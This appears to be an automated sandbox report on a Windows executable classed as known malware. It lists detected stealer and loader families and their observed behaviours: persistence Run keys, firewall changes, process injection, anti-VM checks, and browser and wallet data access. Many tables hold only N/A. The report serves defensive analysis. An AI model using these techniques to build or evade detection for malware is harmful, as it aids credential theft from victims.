Analysis Overview
SHA256
35ab06be2e6fc0fc00327764f68a4f3fc27c1f1f0ad39f42615c82f0a9ce5312
Threat Level: Known bad
The file b98529ce274669010251a0048ff10fb9.exe was found to be: Known bad.
Malicious Activity Summary
Detect Mystic stealer payload
SmokeLoader
Glupteba
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
Mystic
Detect ZGRat V1
Glupteba payload
Stealc
ZGRat
RedLine
Downloads MZ/PE file
Stops running service(s)
Modifies Windows Firewall
Drops file in Drivers directory
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Detected potential entity reuse from brand paypal.
Drops file in System32 directory
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Enumerates system info in registry
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 21:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 21:56
Reported
2023-11-11 21:58
Platform
win10v2004-20231023-en
Max time kernel
151s
Max time network
156s
Command Line
Signatures
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2A67.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\143.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\b98529ce274669010251a0048ff10fb9.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ty1lD96.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LW2uf85.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uI1ds80.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected potential entity reuse from brand paypal.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 7088 set thread context of 6328 | N/A | C:\Windows\System32\WaaSMedicAgent.exe | C:\Windows\system32\svchost.exe |
| PID 6488 set thread context of 5952 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8yo518RN.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 6472 set thread context of 4848 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9mE4sQ5.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 6320 set thread context of 7868 | N/A | C:\Users\Admin\AppData\Local\Temp\2F0C.exe | C:\Users\Admin\AppData\Local\Temp\2F0C.exe |
| PID 4020 set thread context of 4644 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 5296 set thread context of 6500 | N/A | C:\Windows\System32\Conhost.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\Conhost.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
